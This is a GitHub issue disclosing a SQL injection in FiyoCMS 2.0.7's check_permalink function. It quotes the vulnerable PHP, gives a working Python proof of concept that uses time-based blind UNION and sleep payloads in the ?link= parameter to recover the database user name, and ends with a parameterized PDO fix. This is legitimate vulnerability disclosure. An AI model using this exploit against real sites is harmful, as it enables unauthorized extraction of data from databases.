SQL injection in FiyoCMS 2.0.7 #9

Open
xrmht opened this issue Dec 3, 2017 · 0 comments

xrmht commented Dec 3, 2017

Good day.
I found a SQL injection vulnerability in FiyoCMS 2.0.7. This vulnerability allows remote authenticated attackers to obtain information in the context of the user used by the application to retrieve data from the database.

There is no need to log in when exploiting this vulnerability.

File location: /system/site.php

if(_FINDEX_ != 'BACK') {
//
//
}
	else if (SEF_URL){
		if(!empty($pid) AND $pid ==  menuInfo('id')){
			define('Page_ID', $pid);
		}
		else if(isset($_GET['pid']) AND is_numeric($_GET['pid'])) {	
			define('Page_ID', pageInfo($_GET['pid'],'id'));
		}
		else {
			$pid = @check_permalink('permalink',$_REQUEST['link'],'pid');
			if($pid == 0) $pid = oneQuery('menu','global',1,'id');		
			if($pid == 0) $pid = oneQuery('menu','home',1,'id');		
			define('Page_ID', $pid);
		}
	}
}

Noticed that the function check_permalink puts the parameter $_REQUEST['link'] into the database query without filtering.
File location: system/function.php

function check_permalink($field,$value ,$output = null, $like = null) {
	if(empty($like))
		$link = FQuery("permalink","$field = '$value'",$output);
	else
		$link = FQuery("permalink","$field LIKE '%$value%'",$output);
	if(empty($value) or empty($link))
		$link = false;
	else if(empty($output) AND $link > 0) 
		$link = true;
	return $link;
}


Python poc code:

import requests
import time

if __name__ == '__main__':
    Target_url = 'http://127.0.0.1/www/cve/FiyoCMS-1669403ec38e3f100d17786e06bc33c94152fcf3/'

    print 'Began to guess the length of the database user name !!'
    for x in range(50):
        start_time = time.time()
        payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(length(user())={x},sleep(0.3),0)/**/or/**/0,'6'''.format(x=x)
        headers = {'Referer': Target_url}
        response = requests.get(
            Target_url + '/' + payload,
            headers=headers)
        end_time = time.time()
        if (end_time - start_time) > 1:
            length = x
            break

    print 'The database user name length is {length} !!'.format(length=length)

    print 'Start guessing the database username !!'
    username = ''
    for x in range(length + 1):
        pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
        for p in pay_str:
            start_time = time.time()
            headers = {'Referer': Target_url}
            payload = '''?link=u'union/**/select/**/1,2,3,4,0/**/or/**/if(substr(user(),{q},1)='{w}',sleep(0.3),0)/**/or/**/0,'6'''.format(q=x, w=p)
            response = requests.get(
                Target_url + '/' + payload,
                headers=headers)
            end_time = time.time()
            if (end_time - start_time) > 1:
                username = username + p
                print username
                break
    print 'The database user name is {username}'.format(username=username)

I hope you can fix it as soon as possible. If there are any questions, please send me the details to my email at xm001test@gmail.com
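A parameterized rewrite of check_permalink(), added here as an example; it is not FiyoCMS code and not part of the report above. It assumes a PDO connection in $pdo and a table named permalink, and since column names cannot be bound as parameters, it validates $field and $output against a fixed list while the user-supplied value is bound:

```php
<?php
// Added example, not FiyoCMS code. Assumes a PDO connection $pdo and a
// table named "permalink" (assumption based on the FQuery call in the report).

// Column names cannot be bound as parameters, so they are checked against
// an allow-list instead of being interpolated from caller input.
const PERMALINK_FIELDS = ['permalink', 'pid', 'id'];

function check_permalink_safe(PDO $pdo, string $field, string $value,
                              ?string $output = null, ?string $like = null)
{
    if (!in_array($field, PERMALINK_FIELDS, true)) {
        throw new InvalidArgumentException("unexpected field: $field");
    }
    if ($output !== null && !in_array($output, PERMALINK_FIELDS, true)) {
        throw new InvalidArgumentException("unexpected output column: $output");
    }
    if ($value === '') {
        return false;  // mirrors the original empty($value) check
    }
    // Select the requested column, or count matching rows when none is wanted.
    $select = $output === null ? 'COUNT(*)' : "`$output`";

    if (empty($like)) {
        $sql = "SELECT $select FROM `permalink` WHERE `$field` = :value";
        $param = $value;
    } else {
        // Escape LIKE wildcards with '!' so input cannot widen the pattern;
        // '!' is used instead of backslash to avoid MySQL string-escape rules.
        $escaped = strtr($value, ['!' => '!!', '%' => '!%', '_' => '!_']);
        $sql = "SELECT $select FROM `permalink` WHERE `$field` LIKE :value ESCAPE '!'";
        $param = '%' . $escaped . '%';
    }
    // The value travels as a bound parameter, never inside the SQL text,
    // so a quote or UNION in ?link= is treated as data, not as SQL.
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':value', $param, PDO::PARAM_STR);
    $stmt->execute();
    $result = $stmt->fetchColumn();

    if ($result === false || $result === null) {
        return false;
    }
    return $output === null ? ((int)$result > 0) : $result;
}

// Call site equivalent to the one in site.php, without string interpolation:
// $pid = check_permalink_safe($pdo, 'permalink', $_REQUEST['link'] ?? '', 'pid');
```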
